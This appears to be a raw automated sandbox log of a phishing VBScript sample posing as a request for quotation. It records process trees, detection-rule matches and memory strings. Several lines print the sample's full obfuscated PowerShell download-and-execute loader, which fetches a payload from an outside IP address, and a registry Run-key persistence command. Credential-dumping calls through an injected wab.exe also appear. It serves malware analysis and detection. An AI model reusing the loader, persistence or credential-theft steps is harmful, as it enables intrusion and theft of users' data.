Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_004051A4 28_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00401246 28_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_0040CA46 28_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00405235 28_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_004032C8 28_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00401689 28_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00402F60 28_2_00402F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Source: RFQ.NO. S70-23Q-1474-CS-P.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
Source: amsi32_4784.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5768, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4784, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@25/320@2/3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 26_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 28_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 26_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 26_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 26_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Unpredictableness.Neg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2192:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-WTDTSU
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e13p3ojw.iz2.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5768
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4784
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 0000001A.00000002.1937634893.0000000005122000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1932201767.0000000004C10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rzjadswnvivpittonfdpwjkbajsojzmco"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bbote"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rzjadswnvivpittonfdpwjkbajsojzmco" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bbote" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
